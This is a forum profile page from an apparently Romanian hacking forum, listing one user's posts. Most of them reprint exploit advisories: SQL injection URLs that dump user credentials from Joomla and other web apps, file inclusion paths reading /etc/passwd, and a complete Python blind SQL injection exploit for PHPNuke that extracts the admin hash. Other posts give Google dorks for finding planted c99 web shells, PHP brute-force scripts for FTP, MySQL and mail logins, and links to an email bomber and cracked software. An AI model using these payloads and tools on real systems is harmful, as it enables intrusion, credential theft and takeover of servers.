Jump to content

MasT3r ZaTaN

Active Members
  • Posts

    123
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by MasT3r ZaTaN

  1. download: http://rapidshare.com/files/130350621/Google_Earth_Pro_2008_By_Philly93..rar
  2. Archive Password: Code: www.movieloo.info Download URL: Code: http://rapidshare.com/files/128340319/Convert_TEXT_to_Your_HANDWRITING.rar
  3. download: http://rapidshare.com/files/106609370/antkelog.rar
  4. sper sa-mi placa
  5. ------------------------------------------------------------------------------------------- Joomla Component com_content SQL Injection Vulnerabity ------------------------------------------------------------------------------------------- Author : unknown_styler Dork : inurl:com_content POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL} Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/* ------------------------------------------------------------------------------------------------------------------------------------ Greetings : h4ck*-y0u.org side note: <name>Página de contenido</name> <author>Projecte Joomla!</author> <creationDate>July 2004</creationDate> <copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright> <license>[url]http://www.gnu.org/copyleft/gpl.html[/url] GNU/GPL</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>1.0.0</version> # milw0rm.com [2008-07-08]
  6. ######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #======================================================== # Author: Hussin X = # = # Home : [url]www.tryag.cc/cc[/url] = # = # email: darkangel_g85[at]Yahoo[DoT]com = # = #========================================================= # # script : [url]http://dreamlevels.com/dreamnews.php[/url] # # DorK : N/A # ########################################################## Exploit: www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- L!VE DEMO: http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- column_name : user_password user_login Admin Login : /admin/ ########################( Greetz )########################### # # # tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # # # # Iraqihack / FAHD / mos_chori / Silic0n # # # ############################################################# Im IRAQi # milw0rm.com [2008-07-10]
  7. ###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability ###################################################################################################### [~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,| [~] HOME : [url]www.Real-Hack.net[/url] | )(_o/ \o_)( | [~] Email : [email]Ghost-r00t@Hotmail.com[/email] |/ /\ \| [~] Script : gapicms v9.0.2 [~] Download Script : [url]http://heanet.dl.sourceforge.net/source[/url] ... ble.tar.gz ############################# [ I love the Messenger of Allah Mohammad ] ############################# [~] Error ( ktmlpro/includes/ktedit/toolbar.php ) [~] Exploit : [url]http://xxxx/[/url][path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil] ############################# [ I love the Messenger of Allah Mohammad ] ############################ [~] Greetz : PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ] All Member Real Hack And All My Friends .. ###################################################################################################### Real Hack Team ( R-H ) .. ###################################################################################################### # milw0rm.com [2008-07-10]
  8. ######################################################### # # phpDatingClub Local File Include Vulnerability #======================================================== # = # Author: Big Ben = # = #======================================================== # # script : [url]http://www.w2b.ru/download/phpDatingClub.zip[/url] # # DorK : Powered by phpDatingClub # ########################################################## # # Exploit: # # [url]www.[target].com/Script/website.php?page=[/url][LFI] # ########################################################## # milw0rm.com [2008-07-10]
  9. ?????????????????????????????????????????????????????????????????????????????? ?? C r a C k E r ?? ?? T H E C R A C K O F E T E R N A L M I G H T ?? ?????????????????????????????????????????????????????????????????????????????? ????? From The Ashes and Dust Rises An Unimaginable crack.... ????? ?????????????????????????????????????????????????????????????????????????????? ?? [ Local File Include ] ?? ?????????????????????????????????????????????????????????????????????????????? : Author : CraCkEr : : : ? Group : N/A ? ? ? ? Script : Zen Cart 1.3.8 ? ? Register Globals : ? ? Download : SourceForge.net ? ? ? ? Method : GET ? ? [?] ON [ ] OFF ? ? Critical : High [????????] ? ? ? ? Impact : System access ? ? ? ? ????????????????????????????????????? ???????????????????????????????????? ? ? DALnet #crackers ?? ?????????????????????????????????????????????????????????????????????????????? : : ? Release Notes: ? ? ????????????? ? ? Typically used for remotely exploitable vulnerabilities that can lead to ? ? system compromise. ? [url]http://localhost/path/admin/includes/in[/url] ... ader_file=[LFI] [url]http://localhost/path/admin/includes/la[/url] ... p?_SESSION[language]=[LFI] Greets: The_PitBull, Raz0r, iNs, Sad.
  10. safe-mode: off (not secure) drwxrwxrwx c99shell inurl:c99.php inurl:c99.php uid=0(root) root c99.php "Captain Crunch Security Team" inurl:c99 download c99.php download c99.php download c99.php inurl:c99.php inurl:c99.php allinurl: c99.php inurl:c99.php allinurl: c99.php inurl:"/c99.php" allinurl: c99.php inurl:c99.php inurl:"c99.php" c99shell inurl:c99.php uid=0(root) c99shell powered by admin c99shell powered by admin inurl:"/c99.php" inurl:c99.php inurl:c99.php inurl:c99.php c99 shell v.1.0 (roots) inurl:c99.php allintitle: "c99shell" inurl:"c99.php inurl:"c99.php allinurl: "c99.php" inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname intitle:C99Shell v. 1.0 pre-release +uname allinurl: "c99.php" inurl:c99.php inurl:"c99.php" inurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:"c99.php" c99shell inurl:c99.php inurl:"c99.php" allinurl:c99.php inurl:"/c99.php inurl:c99.php? inurl:/c99.php+uname allinurl:"c99.php" allinurl:c99.php inurl:"c99.php" inurl:"c99.php" allinurl:c99.php allinurl:c99.php? allinurl:c99.php? allinurl:c99.php? "inurl:c99..php" allinurl:c99.php c99shell [file on secure ok ]? inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php powered by Captain Crunch Security Team allinurl:c99.php "c99.php" filetype:php allinurl:c99.php inurl:c99.php allinurl:.c99.php "inurl:c99.php" c99. PHP-code Feedback Self remove allinurl:c99.php download c99.php allinurl:c99.php inurl:c99.php allinurl: "c99.php" allinurl:c99.php allinurl:c99.php c99shell inurl:c99.php inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname allinurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php safe-mode: off (not secure) drwxrwxrwx c99shell inurl:/c99.php inurl:"c99.php" inurl:c99.php inurl:c99.php c99.php download inurl:c99.php inurl:"c99.php" inurl:/c99.php inurl:"c99.php?" inurl:c99.php inurl:c99.php files/c99.php c99shell filetype:php -echo c99shell powered by admin inurl:c99.php inurl:c99.php inurl:"c99.php" inurl:c99.php uid=0(root) allinurl:c99.php inurl:"c99.php" inurl:"c99.php" inurl:"/c99.php" intitle:"C99shell" inurl:"/c99.php" intitle:"C99shell" inurl:"/c99.php" intitle:"C99shell" C99Shell v. 1.0 pre-release build #5 inurl:c99.php inurl:c99.php --[ c99shell v. 1.0 pre-release build #16 c99shell linux infong c99shell linux infong C99Shell v. 1.0 pre-release build !C99Shell v. 1.0 beta! Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout !c99shell v. 1+Safe-mode: OFF (not secure) "C99Shell v. 1.0 pre-release build " intitle:c99shell +filetype:php inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout intitle:!C99Shell v. 1.0 pre-release build #16! root !C99Shell v. 1.0 pre-release build #5! inurl:"c99.php" C99Shell v. 1.0 pre-release build #16! c99shell v. 1.0 pre-release build #16 intitle:c99shell intext:uname allintext:C99Shell v. 1.0 pre-release build #12 c99shell v. 1.0 pre-release build #16 --[ c99shell v. 1.0 pre-release build #15 | Powered by ]-- allinurl: "c99.php" allinurl: "c99.php" Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout "c99shell v 1.0" ftp apache inurl:c99.php c99shell+v.+1.0 16 C99Shell v. 1.0 pre-release build #16 download intitle:c99shell "Software: Apache" allinurl: c99.php allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout powered by Captain Crunch Security Team powered by Captain Crunch Security Team !C99Shell v. 1.0 pre-release build #5! c99shell v. 1.0 release security c99shell v. 1.0 pre-release build inurl:c99.php c99shell [file on secure ok ]? C99Shell v. 1.3 Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php uid=0(root) powered by Captain Crunch Security Team C99Shell v. 1.0 pre-release build #16 c99shell[on file]ok c99shell[file on ]ok Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php "C99Shell v. 1.0 pre" =C99Shell v. 1.0 pre-release Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout c99shell v. pre-release build inurl:c99.php c99 shell inurl:c99.php c99 shell powered by Captain Crunch Security Team inurl:c99.php inurl:c99.php !C99Shell v. 1.0 pre-release build #5! intitle:"c99shell" filetype:php root intitle:"c99shell" Linux infong 2.4 C99Shell v. 1.0 beta ! C99Shell v. 1.0 pre-release build # inurl:"c99.php" allintext:C99Shell v. 1.0 pre-release build #12 "C99Shell v. 1.0 pre" powered by Captain Crunch Security Team Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:/c99.php? allinurl:c99.php intitle:C99Shell pre-release inurl:"c99.php" powered by Captain Crunch Security Team inurl:c99.php C99Shell v. 1.0 pre-release build #16! allinurl:c99.php C99Shell v. 1.0 pre-release build #16 administrator intitle:c99shell filetype:php powered by Captain Crunch Security Team powered by Captain Crunch Security Team C99Shell v. 1.0 pre-release build #12 c99shell v.1.0 allinurl:c99.php "c99shell v. 1.0 pre-release build" inurl:"c99.php" filetype:php "c99shell v. 1.0 " ok c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout c99shell v. 1.0 pre-release build #16 | !C99Shell v. 1.0 pre-release build #5! !C99Shell v. 1.0 pre-release build #5! allinurl:/c99.php powered by Captain Crunch Security Team inurl:c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php powered by Captain Crunch Security Team inurl:c99.php C99Shell v. 1.0 pre-release inurl:c99.php inurl:c99.php ext:php inurl:"c99.php" allinurl:"c99.php" Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout powered by Captain Crunch Security Team Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout" C99Shell v. 1.0 pre-release build #16 software apache Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout "c99shell v 1.0" inurl:"c99.php" allintitle: C99shell filetype:php C99Shell v. 1.0 pre-release build #16! "c99shell v. 1.0 pre-release" c99shell v. 1.0 pre-release build #5 allinurl:"c99.php" filetype:php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout !C99Shell v. 1.0 pre-release build #16! inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname inurl:c99.php c99shell v. 1.0 allinurl: c99.php --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- inurl:"/c99.php" c99shell +uname c99shell php + uname c99shell php + uname --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- allinurl:c99.php !C99Shell v. 1.0 pre-release build #5! C99Shell v.1.0 pre-release Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php intitle:c99shell filetype:php "Encoder Tools Proc. FTP brute" "c99" filetype:php intext:"Safe-Mode: OFF" c99shell v. 1.0 pre inurl:c99.php intitle:c99shell uname -bbpress intitle:"index.of" c99.php inurl:admin/files/ intitle:"index of /" "c99.php" intitle:"index of" intext:c99.php intitle:index.of c99.php intitle:"index of" + c99.php intitle:index/of file c99.php intitle:index/of file c99.php index of /admin/files/ intitle:"Index of/"+c99.php c99.php "intitle:Index of " c99.php "intitle:Index of " c99.php "intitle:Index of " intitle:index.of c99.php img/c99.php intitle:index.of c99.php img.c99.php intitle:"Index of/"+c99.php "index of /" c99.php c99.php intitle:"Index of" c99.php "index of" c99.php "Index of/"+c99.php
  11. #!/usr/bin/python #=================================================================================================# # This is a Priv8 Exploit. # # Date: 23/02/2008 [dd,mm,yyyy] # # # #=================================================================================================# # PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2 # # Response Analisys Method # # # # Vendor: [url]http://www.phpnuke.org[/url] # # Severity: Highest # # Author: The:Paradox # #=================================================================================================# # Server configuration requirments: # # magic_quotes_gpc = 0 # #=================================================================================================# # Proud To Be Italian. # #=================================================================================================# """ Related Codes: mainfile.php; line 89; if (!ini_get('register_globals')) { @import_request_variables("GPC", ""); } /Your_Account/index.php; line 1700; switch($op) { // case "activate": activate($username, $check_num); break; // } /Your_Account/index.php; line 161: function activate($username, $check_num) { global $db, $user_prefix, $module_name, $language, $prefix; $username = filter($username, "nohtml", 1); $past = time()-86400; $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past"); $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'"; echo $sql; $result = $db->sql_query($sql); """ #=================================================================================================# # Proof Of Concept / Bug Explanation: # # # # I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable. # # Byte null bypasses all query string check. # # # #=================================================================================================# # Google Dork=> Powered by PHPNuke # #=================================================================================================# # Use this at your own risk. You are responsible for your own deeds. # #=================================================================================================# # Python Exploit Starts # #=================================================================================================# import httplib, sys, time print "\n#=========================================================#" print " PHPNuke <= 8.0 And Maybe Higher " print " Blind Sql Injection Vulnerability Mq=0 " print " Response Analisys Method " print " " print " Discovered By The:Paradox " print " " print " Usage: " print " python %s [Target] [Path] [UsernameUnveryfied] " % (sys.argv[0]) print " " print " Example: " print " python %s 127.0.0.1 /Nuke/ Abdullah " % (sys.argv[0]) print " python %s [url]www.host.com[/url] / Andrea " % (sys.argv[0]) print " " print " " print "#=========================================================#\n" if len(sys.argv)<=3: sys.exit() else: print "[.]Exploit Starting." target = sys.argv[1] path = sys.argv[2] prefix = "nuke_" port = "80" j=1 h4sh = "" md5tuple = [] for k in range(48,58): md5tuple.append(k) # 48->57 and 97->102 for k in range(97,103): md5tuple.append(k) md5tuple.append('END') # Result query >>> # # SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1' # print "[.]Blind Sql Injection Starts.\n\nHash:" while j <= 32: for i in md5tuple: if i == 'END': sys.exit('[-]Exploit Failed.\n') conn = httplib.HTTPConnection(target,port) conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"}) response = conn.getresponse() time.sleep(0.5) if response.status == 404: sys.exit('[-]Error 404. Not Found.') if response.read().find("New user verification number is invalid.") != -1: sys.stdout.write(chr(i)) sys.stdout.flush() h4sh += chr(i) j += 1 break; print "\n\n[+]All Done.\n-=Paradoxe=-"
  12. @~~===========================================~~@ | Author => StAkeR ~ [email]StAkeR@hotmail.it[/email] | @~~===========================================~~@ + @~~==========================================================================~~@ | CAT2 <= 1.Local File Inclusion Vulnerability | @~~==========================================================================~~@ | objects/extern/spaw/spaw_control.class.php?spaw_root=../../etc/passwd%00 | @~~==========================================================================~~@ + @~~====================================================~~@ | [url]http://downloads.sourceforge.net/cat-2/CAT2-1_2.zip[/url] | @~~====================================================~~@ # milw0rm.com [2008-07-01]
  13. *********/////// Blog Particle 8.0 Directory Traversal,Database credential \\\\\\\\***************** by: e.wiZz!Site: madspot.org Info: cybernetic is Gay Hacker ah ah ah ah. You are shame for .hr In the wild..... *************************************** Vendor: blogparticle.comDork: "powered by BP Blog 8.0"Download: [url]http://blog.betaparticle.com/uploads/blog_8.0.zip[/url] ****************DIRECTORY TRAVERSAL*********you cant list v. directories,but you can files: [url]http://somewhereinthewild.com/fckeditor/editor/filemanager/browser/default/frmupload.htmlhttp://somewhereinthewild.com/_mmServerScripts/adojavas.incPoC:[/url] [url]http://keune.org/blog/_mmServerScripts/adojavas.inchttp://www.markrushworth.com/_mmServerScripts/adojavas.inc[/url] ***************DATABASE COMPLETE INFO VULNERABILITY*************** [url]http://somewhereinwild.com/Connections/blog.sqlYou[/url] have database username,password,and other blog info _________________________________________________________________ Connect to the next generation of MSN Messenger? [url]http://imagine-msn.com/messenger/launch80/default.aspx?locale=en-us&source=wlmailtagline[/url]
  14. Ftp brute <?php set_time_limit(0); $host = "host.ru"; // ????????? ???? $port = 21; // ????????? ???? $uid_file = file("login.txt"); // ???? ? ??????? $pwd_file = file("passw.txt"); // ???? ? ???????? $brute_save = fopen("brute_save_ftp.txt","a+"); // ???? ????? ?????? ?????????? ???????? $yes_connect = 0; $no_connect = 0; if($conn = @ftp_connect($host, $port)) { for($i=0; $i<count($uid_file); $i++) { $login = trim($uid_file[$i]); for($j=0; $j<count($pwd_file); $j++) { $passwd = trim($pwd_file[$j]); if($ftp_conn = @ftp_login($conn, $login, $passwd)) { fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n"); ftp_quit($conn); $yes_connect++; } else { $no_connect++; continue; } } } } else { echo "<font face=Tahoma color=#444444 size=2>?? ??????? ?????????? ????? ? $host</font> "; exit(); } echo "<font face=Tahoma color=#444444 size=2>??????? ???????????: $yes_connect</font> "; echo "<font face=Tahoma color=red size=2>????????? ???????: $no_connect</font> "; $[b][/b]show_brute = file("brute_save_ftp.txt"); for($i=0; $i<count($show_brute); $i++) { list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]); echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font> "; } ?> SQL Brute <?php $host = "localhost"; // ????????? ???? ?? ??????? ????? ??????? $port = "3306"; // ????????? ???? ??????? $uid_file = file("login.txt"); // ???? ? ??????? $pwd_file = file("passw.txt"); // ???? ? ???????? $brute_save = fopen("brute_save.txt","a+"); // ???? ????? ?????? ?????????? ???????? $yes_connect = 0; $no_connect = 0; for($i=0; $i<count($uid_file); $i++) { $login = trim($uid_file[$i]); for($j=0; $j<count($pwd_file); $j++) { $passwd = trim($pwd_file[$j]); if($conn = @mysql_connect($host.":".$port, $login, $passwd)) { flock($brute_save, 3); fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n"); flock($brute_save, 1); mysql_close($conn); $yes_connect++; } else { $no_connect++; continue; } } } echo "<font face=Tahoma color=#444444 size=2>??????? ???????????: $yes_connect</font> "; echo "<font face=Tahoma color=red size=2>????????? ???????: $no_connect</font> "; $show_brute = file("brute_save.txt"); for($i=0; $i<count($show_brute); $i++) { list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]); echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font> "; } ?> Mail Brute <?php set_time_limit(0); $user_login = file("user_mail.txt"); $uesr_passwd = file("user_passwd.txt"); $apop = 0; include_once("./pop3.php"); for($i=0; $i<count($user_login); $i++) { $u_login = trim($user_login[$i]); for($j=0; $j<count($user_passwd); $j++) { $u_passwd = trim($user_passwd[$j]); $pop3_connection = new pop3_class; $pop3_connection->hostname = "pop3.mail.ru"; if($pop3_connection->Open()) { if($pop3_connection->Login($u_login, $u_passwd, $apop)) { echo "Congritulation!"; $pop3_connection->Close(); } else { echo "SHIT"; } } else { echo "Failed!"; exit(); } } } ?>
  15. download: http://rapidshare.com/files/130255423/Email_Bomber.zip.html
  16. C-Force-----One of the best in my option Access Driver----the best ...i think Sentry----noobish good if your just starting out Brutus----oldy but goody Charon---for finding anon proxies a must if your going to use the first 4 Raptor--wordlist generator and filter for making passwords and usernames This is pretty much everything to need to crack a forum or website.. {{{{{{!!!!!!!USE ANON PROXIES!!!!!!!!!}}}}}}} Download: Code: http://rapidshare.com/files/84951006/Web_Crack.rar
  17. fff buna alegere e chiar frumos
  18. nebuni
  19. incearca Hide Ip : http://www.hide-ip-soft.com/download.htm sau foloseste un proxy: http://www.proxy4free.com/page1.html
  20. bun revenit
  21. auzi la el nu merg linkurile :shock:
  22. sincer :shock:
  23. Daca cineva a facut redirect catre site-ul nostru nu inseamna ca cineva din staff este vinovat iar pe useri nu ii poate controla nimeni. Noi suntem zei de foarte mult timp. kw3rln e zeul berii, sysghost al vinului, Kenpachi al ungurilor si lista poate continua. ))) Nemessis tu al cui zeu esti? ) )))
  24. bun venit
×
×
  • Create New...